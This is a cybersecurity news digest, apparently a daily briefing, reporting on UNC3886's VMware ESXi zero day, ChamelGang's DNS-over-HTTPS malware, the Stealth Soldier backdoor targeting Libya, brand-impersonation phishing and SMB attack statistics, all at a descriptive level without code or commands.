At a glance.
- Chinese threat actor exploits VMware ESXi zero day.
- ChamelGang uses DNS-over-HTTPS tunneling.
- Cyberespionage campaign targets Libya.
- Brand impersonation online fraud.
- Cyber risk trends for small and medium businesses.
Chinese threat actor exploits VMware ESXi zero day.
Mandiant says a Chinese cyberespionage actor tracked as "UNC3886" is using a VMware ESXi zero day flaw "that enabled the execution of privileged commands across Windows, Linux, and PhotonOS (vCenter) guest VMs without authentication of guest credentials from a compromised ESXi host and no default logging on guest VMs." After exploiting the vulnerability, the threat actor "[deployed] backdoors on ESXi hosts using an alternative socket address family, VMCI, for lateral movement and continued persistence. This address family enabled direct reconnection from any guest VM to the compromised ESXi host’s backdoor regardless of network segmentation or firewall rules in place."
Charles Carmakal, CTO, Mandiant Consulting, Google Cloud, offered the following comments:
"UNC3886 is one of the most clever China-nexus espionage actors that we see nowadays. They have strong operational security and are very hard to detect in victim environments. They monitor Mandiant's blogs that describe their tradecraft and they quickly retool to evade detection. They try to limit their malware deployment to victim systems that do not support endpoint detection and response (EDR) solutions, making it very difficult for organizations to detect their intrusions. They've successfully compromised defense, technology, and telecommunications organizations with mature security programs in place."
ChamelGang uses DNS-over-HTTPS tunneling.
Researchers at Stairwell have observed a new strain of Linux malware that uses DNS-over-HTTPS (DoH) tunneling. The malware was developed by ChamelGang, a China-aligned threat actor that's targeted "energy, aviation, and government organizations in Russia, the United States, Japan, Turkey, Taiwan, Vietnam, India, Afghanistan, Lithuania, and Nepal." The researchers state, "The implant’s C2 configuration is a JSON object containing two keys....This configuration is then used by the implant to craft DoH requests using the configured providers and malicious nameservers, encoding its C2 communications as subdomains of the malicious nameserver and issuing TXT requests for the generated domain containing the encoded C2 communications. Due to these DoH providers being commonly utilized DNS servers for legitimate traffic, they cannot easily be blocked enterprise-wide. Additionally, HTTPS prevents inspection of these requests without man-in-the-middling the traffic, so defenders cannot easily identify what domain requests are being made over DoH and selectively detect or prevent anomalous traffic such as ChamelDoH’s encoded communications."
Cyberespionage campaign targets Libya.
Check Point describes an espionage campaign that targeted entities in Libya with a new backdoor tracked as "Stealth Soldier." The threat actor used phishing sites that purported to belong to the Libyan Foreign Affairs Ministry. Check Point states, "Stealth Soldier is a custom implant, likely used in a limited set of targeted attacks. The implant enables surveillance operations and supports functionality such as keystroke logging and screenshot and microphone recordings. The different versions found suggest that Stealth Soldier is actively maintained as of January 2023, the compilation timestamp of its latest version."
The researchers discovered ties with the state-sponsored Eye on the Nile campaign that targeted civil society organizations in Egypt in 2019.
Brand impersonation online fraud.
Researchers at Bolster have observed a phishing campaign that’s impersonating more than a hundred clothing and footwear brands. It’s direct fraud, targeting online consumers. The impersonated brands include Nike, Puma, Adidas, Casio, Crocs, Skechers, Caterpillar, New Balance, Fila, and Vans. The threat actors have used over 6,000 domains, more than half of which are still active. The researchers note that some of the scam sites appear prominently in Google search results: “Attackers are employing various search engine optimization (SEO) techniques to manipulate search engine rankings and increase visibility. This attack seems meticulously planned as the domains were registered two years in advance, allowing for aged domains that in some cases greatly increases their rank to the second or third result in Google search for many brand-related keywords.”
Cyber risk trends for small and medium businesses.
Researchers at BlackFog have determined that 61% of SMBs have sustained a successful cyberattack in the past twelve months. The researchers state, “On average organizations saw close to five successful data breaches, malware or ransomware attacks affecting their network. Critically for SMBs, the main impact of an attack was business downtime, which affected 58% of respondents. The successful attacks also negatively impacted customer trust and retention with a third of all respondents reporting that the incidents resulted in the loss of customers. Worryingly, 39% of organizations affected also reported a loss of customer data.”